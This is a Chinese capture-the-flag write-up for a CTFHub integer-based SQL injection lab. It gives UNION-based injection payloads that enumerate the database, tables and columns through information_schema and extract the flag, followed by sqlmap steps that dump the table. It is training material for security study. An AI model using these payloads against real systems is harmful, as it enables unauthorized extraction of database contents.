题目来源：ctfhub技能树

目录

一、打开靶机，整理已知信息

二、手工注入解题

step 1：查看注入类型

step 2：order by语句判断字段数

step 3：爆数据库名

step 4：爆表名

step 5：爆列名

step 6：爆具体数据

sqlmap%E8%A7%A3%E9%A2%98%E2%80%94%E2%80%94%E5%9B%9B%E6%AD%A5%E8%B5%B0-toc" name="tableOfContents" style="margin-left:0px">三、sqlmap解题——四步走

step 1：--current-db

step 2：-D 数据库名 --tables

​step 3：-D 数据库名 -T 表名 --columns

step 4：-D 数据库名 -T 表名 -C 列名 --dump

---

一、打开靶机，整理已知信息

        查看页面信息，提示”MySQL结构”，所以为sql注入，两种思路：①手工注入；②sqlmap

二、手工注入解题

step 1：查看注入类型

键入：1

键入：1'键入：1''

键入：1 and 1=2 #

键入：1 and 1=1 #

由回显可得本题为整数型注入

step 2：order by语句判断字段数

键入：1 order by 2 #（根据经验，陌生题可使用二分法）

step 3：爆数据库名

sql">1 and 1=2 union select database(),database() #

step 4：爆表名

sql">1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' #

出现了奇怪的东西，继续看

step 5：爆列名

sql">1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='lcwaabhcjo' #

东西应该就在这里

step 6：爆具体数据

sql">1 and 1=2 union select 1,zrlcbgazoj from sqli.lcwaabhcjo #

得到flag

sqlmap%E8%A7%A3%E9%A2%98%E2%80%94%E2%80%94%E5%9B%9B%E6%AD%A5%E8%B5%B0" name="%E4%B8%89%E3%80%81sqlmap%E8%A7%A3%E9%A2%98%E2%80%94%E2%80%94%E5%9B%9B%E6%AD%A5%E8%B5%B0">三、sqlmap解题——四步走

step 1：--current-db

step 2：-D 数据库名 --tables

step 3：-D 数据库名 -T 表名 --columns

step 4：-D 数据库名 -T 表名 -C 列名 --dump

得到flag。【sqlmap——YYDS】